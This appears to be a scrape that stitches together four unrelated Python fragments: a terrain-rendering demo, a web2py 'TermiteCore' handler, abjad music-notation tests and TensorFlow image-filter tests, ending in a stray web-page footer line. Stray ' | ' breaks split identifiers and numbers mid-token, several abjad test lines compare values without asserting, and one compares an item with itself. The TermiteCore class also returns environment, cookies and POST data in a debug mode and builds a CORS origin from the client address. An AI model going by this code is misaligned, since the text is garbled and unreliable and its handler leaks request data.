colors[(x, z)] = generate | _color(x, z)
# generate triangles and track normals for all vertices
for x in xrange(-size, size):
for z in xrange(-size, size):
t1 = [x + 0, z + 0, x + 1, z + 0, x + 0, z + 1]
t2 = [x + 0, z + 1, x + 1, z + 0, x + 1, z + 1]
for t in [t1, t2]:
x1, z1, x2, z2, x3, z3 = t
p1 = (x1, height[(x1, z1)], z1)
p2 = (x2, height[(x2, z2)], z2)
p3 = (x3, height[(x3, z3)], z3)
c1 = colors[(x1, z1)]
c2 = colors[(x2, z2)]
c3 = colors[(x3, z3)]
position.extend([p3, p2, p1])
color.extend([c3, c2, c1])
n = pg.normalize(pg.cross(pg.sub(p3, p1), pg.sub(p2, p1)))
normals[(x1, z1)].append(n)
normals[(x2, z2)].append(n)
normals[(x3, z3)].append(n)
# compute average normal for all vertices
for key, value in normals.items():
normals[key] = pg.normalize(reduce(pg.add, value))
for x, y, z in position:
normal.append(normals[(x, z)])
# generate vertex buffer
vb = pg.VertexBuffer(pg.interleave(position, normal, color))
self.context.position, self.context.normal, self.context.color = (
vb.slices(3, 3, 3))
def update(self, t, dt):
matrix = pg.Matrix()
matrix = self.wasd.get_matrix(matrix)
matrix = matrix.perspective(65, self.aspect, 0.1, 1000)
self.context.matrix = matrix
self.context.camera_position = self.wasd.position
def draw(self):
self.clear()
self.context.draw()
if __name__ == "__main__":
pg.run(Window)
|
#!/usr/bin/env python
import os
import json
class TermiteCore:
def __init__( self, request, response ):
self.request = request
self.response = response
def GetConfigs( self ):
def GetServer():
return self.request.env['HTTP_HOST']
def GetDataset():
return self.request.application
def GetModel():
return self.request.controller
def GetAttribute():
return self.request.function
def GetDatasets( dataset ):
FOLDER_EXCLUSIONS = frozenset( [ 'admin', 'examples', 'welcome', 'init' ] )
applications_parent = self.request.env['applications_parent']
applications_path = '{}/applications'.format( applications_parent )
folders = []
for folder in os.listdir( applications_path ):
applications_subpath = '{}/{}'.format( applications_path, folder )
if os.path.isdir( applications_subpath ):
if folder not in FOLDER_EXCLUSIONS:
folders.append( folder )
folders = sorted( folders )
return folders
def GetModels( dataset, model ):
if dataset == 'init':
return None
app_data_path = '{}/data'.format( self.request.folder )
folders = []
for folder in os.listdir( app_data_path ):
app_data_subpath = '{}/{}'.format( app_data_path, folder )
if os.path.isdir( app_data_subpath ):
folders.append( folder )
folders = sorted( folders )
return folders
def GetAttributes( dataset, model, attribute ):
if dataset == 'init':
return None
if model == 'default':
return None
if model == 'lda':
return [
'DocIndex',
'TermIndex',
'TopicIndex',
'TermTopicMatr | ix',
'DocTopicMatrix',
'TopicCooccurrence'
]
elif model == 'corpus':
return [
'DocMeta',
'TermFreqs',
'TermCoFreqs'
]
else:
return []
server = GetServer()
dataset = GetDataset()
datasets = GetDatasets( dataset )
model = GetModel()
models = GetModels( dataset, model )
attribute = GetAttrib | ute()
attributes = GetAttributes( dataset, model, attribute )
configs = {
'server' : server,
'dataset' : dataset,
'datasets' : datasets,
'model' : model,
'models' : models,
'attribute' : attribute,
'attributes' : attributes
}
return configs
def IsDebugMode( self ):
return 'debug' in self.request.vars
def IsJsonFormat( self ):
return 'format' in self.request.vars and 'json' == self.request.vars['format'].lower()
def GenerateResponse( self, params = {}, keysAndValues = {} ):
if self.IsDebugMode():
return self.GenerateDebugResponse()
else:
return self.GenerateNormalResponse( params, keysAndValues )
def GenerateDebugResponse( self ):
def GetEnv( env ):
data = {}
for key in env:
value = env[key]
if isinstance( value, dict ) or \
isinstance( value, list ) or isinstance( value, tuple ) or \
isinstance( value, str ) or isinstance( value, unicode ) or \
isinstance( value, int ) or isinstance( value, long ) or isinstance( value, float ) or \
value is None or value is True or value is False:
data[ key ] = value
else:
data[ key ] = 'N/A'
return data
info = {
'env' : GetEnv( self.request.env ),
'cookies' : self.request.cookies,
'vars' : self.request.vars,
'get_vars' : self.request.get_vars,
'post_vars' : self.request.post_vars,
'folder' : self.request.folder,
'application' : self.request.application,
'controller' : self.request.controller,
'function' : self.request.function,
'args' : self.request.args,
'extension' : self.request.extension,
'now' : str( self.request.now )
}
return json.dumps( info, encoding = 'utf-8', indent = 2, sort_keys = True )
def GenerateNormalResponse( self, params, keysAndValues = {} ):
data = {
'params' : params,
'configs' : self.GetConfigs()
}
data.update( keysAndValues )
dataStr = json.dumps( data, encoding = 'utf-8', indent = 2, sort_keys = True )
# Workaround while we build up the server-client architecture
self.response.headers['Access-Control-Allow-Origin'] = 'http://' + self.request.env['REMOTE_ADDR'] + ':8080'
if self.IsJsonFormat():
return dataStr
else:
data[ 'content' ] = dataStr
return data
|
anager.compare(
voice,
r'''
\new Voice \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\new Voice {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
assert signatures[0] == signatures[1]
assert signatures[0] != signatures[2]
assert signatures[0] != signatures[4]
assert signatures[0] == signatures[6]
assert signatures[2] == signatures[3]
assert signatures[2] != signatures[4]
def test_selectiontools_Parentage_logical_voice_05():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
voice = Voice(
r'''
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
'''
)
override(voice).note_head.color = 'red'
voice.name = 'foo'
assert systemtools.TestManager.compare(
voice,
r'''
\context Voice = "foo" \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
signatures[0] == signatures[1]
signatures[0] == signatures[2]
signatures[0] != signatures[4]
signatures[0] == signatures[6]
signatures[2] == signatures[0]
signatures[2] == signatures[3]
signatures[2] == signatures[4]
signatures[2] == signatures[6]
signatures[4] != signatures[0]
signatures[4] != signatures[2]
signatures[4] == signatures[5]
signatures[4] == signatures[6]
def test_selectiontools_Parentage_logical_voice_06():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container([
Staff([Voice("c'8 d'8")]),
Staff([Voice("e'8 f'8")]),
])
container[0].name = 'staff1'
container[1].name = 'staff2'
container[0][0].name = 'voicefoo'
container[1][0].name = 'voicefoo'
beam = Beam()
statement = 'attach(beam, container.select_leaves())'
assert pytest.raises(AssertionError, statement)
leaves = container.select_leaves(allow_discontiguous_leaves=True)
beam = Beam()
attach(beam, leaves[:2])
beam = Beam()
attach(beam, leaves[2:])
assert systemtools.TestManager.compare(
container,
r'''
{
\context Staff = "staff1" {
\context Voice = "voicefoo" {
c'8 [
d'8 ]
}
}
\context Staff = "staff2" {
\context Voice = "voicefoo" {
e'8 [
f'8 ]
}
}
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in leaves]
signatures[0] == signatures[1]
signatures[0] != signatures[2]
signatures[2] != signatures[2]
signatures[2] == signatures[3]
def test_selectiontools_Parentage_logical_voice_07():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container(
r'''
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" {
g'8
}
}
a'8
'''
)
override(container[1][1]).note_head.color = 'red'
override(container[2][1]).note_head.color = 'red'
assert systemtools.TestManager.compare(
container,
r'''
{
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
g'8
}
}
a'8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in container.select_leaves(allow_discontiguous_leaves=True)]
signatures[0] != signatures[1]
signatures[0] != signatures[2]
signatures[0] != signatures[3]
signatures[0] != signatures[4]
signatures[0] == signatures[5]
signatures[1] != signatures[0]
signatures[1] != signatures[2]
signatures[1] == signatures[3]
signatures[1] != signatures[4]
signatures[1] != signatures[5]
signatures[2] != signatures[0]
signatures[2] != signatures[1]
signatures[2] != signatures[3]
signatures[2] == signatures[4]
signatures[2] != signatures[5]
def test_selectiontools_Parentage_logical_voice_08():
r'''Unicorporated leaves carry equivalent containment signatures.
'''
note_1 = Note(0, (1, 8))
note_2 = Note(0, (1, 8))
signature_1 = inspect_(note_1).get_parentage().logical_voice
signature_2 = inspect_(note_2).get_parentage().logical_voice
assert signature_1 == signature_2
def test_selectiontools_Parentage_logical_voice_09():
r'''Notes appear in the same logical voice.
'''
t1 = Staff([Voice([Note(0, (1, 8))])])
t1.name = 'staff'
t1[0].name = 'voice'
t2 = Staff([Voice([Note(0, (1, 8))])])
t2.name = 'staff'
t2[0].name = 'voice'
t1_leaf_signature = inspect_(t1.select_leaves()[0]).get_parentage().logical_voice
t2_leaf_signature = inspect_(t2.select_leaves()[0]).get_parentage().logical_voice
assert t1_leaf_signature == t2_leaf_signature
def test_selectiontools_Parentage_logical_voice_10():
r'''Measure and leaves must carry same logical voice signature.
'''
staff = Staff(r'''
{
\time 2/8
| c'8
d'8
}
e'8
f'8
''')
assert systemtools.TestManager.compa | re(
staff,
r'''
\new Staff {
{
\time 2/8
c'8
d'8
}
e'8
f'8
}
'''
)
assert inspect_(staff[0]).get_parentage().logical_voice == \
inspect_(staff[-1]).get_parentage().logical_voice
assert inspect_(staff[0]).get_parentage().logical_voice == \
inspect_(staff[0][0]).get_parentage().logical_voice
assert inspect_(staff[0][0]).get_parentage().logical_voice == \
inspect_(staff[-1]).get_parentage().logical_voice
def test_selectiontools_Parentage_logical_voice_11():
r'''Leaves inside different staves have different logical voice
signatures, even when the staves have the same name.
'''
container = Container(2 * Staff("c'8 c'8"))
container[0].name = container[1].name = 'staff'
assert systemtools.TestManager.compare(
container,
r'''
{
\context Staff = "staff" {
c'8
c'8
}
|
plane = tf.constant(
[x for x in range(1, height * width + 1)], shape=(height, width), dtype=dtype
)
image = tile_image(plane, image_shape=image_shape)
result = filter2d_fn(
image,
filter_shape=filter_shape,
padding=padding,
constant_values=constant_values,
)
return result
def verify_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, expected_plane
):
expected_output = tile_image(expected_plane, image_shape)
for dtype in _dtypes_to_test:
result = setup_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, dtype
)
np.testing.assert_allclose(
result.numpy(),
tf.dtypes.cast(expected_output, dtype).numpy(),
rtol=1e-02,
atol=1e-02,
)
def setUp(self):
self._filter2d_fn = mean_filter2d
super().setUp()
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_mean(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
mean_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_mean(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
mean_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_mean():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, padding="TEST")
def test_none_channels_mean():
# 3-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(shape=(1, 3, 3, 3)))
@pytest.mark.parametrize("shape", [(3, 3), (3, 3, 3), (1, 3, 3, 3)])
def test_unknown_shape_mean(shape):
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(shape=None, dtype=tf.dtypes.float32),
padding="CONSTANT",
constant_values=1.0,
)
image = tf.ones(shape=shape)
np.testing.assert_equal(image.numpy(), fn(image).numpy())
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[3.6666667, 4.0, 4.3333335],
[4.6666665, 5.0, 5.3333335],
[5.6666665, 6.0, 6.3333335],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_4x4_filter_mean(image_shape):
expected_plane = tf.constant(
[
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(4, 4),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_constant_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[1.3333334, 2.3333333, 1.7777778],
[3.0, 5.0, 3.6666667],
[2.6666667, 4.3333335, 3.1111112],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=0,
expected_plane=expected_plane,
)
expected_plane = tf.constant(
[
[1.8888888, 2.6666667, 2.3333333],
[3.3333333, 5.0, 4.0],
[3.2222223, 4. | 6666665, 3.6666667],
]
)
verify_values(
mean_filt | er2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=1,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_symmetric_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[2.3333333, 3.0, 3.6666667],
[4.3333335, 5.0, 5.6666665],
[6.3333335, 7.0, 7.6666665],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="SYMMETRIC",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_median(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
median_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_median(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
mean_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_median():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, padding="TEST")
def test_none_channels_median():
# 3-D image
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(shape=(1, 3, 3, 3)))
@pytest.mark.parametrize("shape", [(3, 3), (3, 3, 3), (1, 3, 3, 3)])
def test_unknown_shape_median(shape):
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(shape=None, dtype=tf.dtypes.float32),
padding="CONSTANT",
constant_values=1.0,
)
image = tf.ones(shape=shape)
np.testing.assert_equal(image.numpy(), fn(image).numpy())
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_3x3_filter_median(image_shape):
expected_plane = tf.constant([[4, 4, 5], [5, 5, 5], [5, 6, 6]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_4x4_filter_median(image_shape):
expected_plane = tf.constant([[5, 5, 5], [5, 5, 5], [5, 5, 5]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(4, 4),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_constant_padding_with_3x3_filter(image_shape):
expected_plane = tf.constant([[0, 2, 0], [2, 5, 3], [0, 5, 0]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=0,
expected_plane=expected_plane,
)
expected_plane = tf.constant([[1, 2, 1], [2, 5, 3], [1, 5, 1]])
verify_values(
median_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=1,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.ma |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.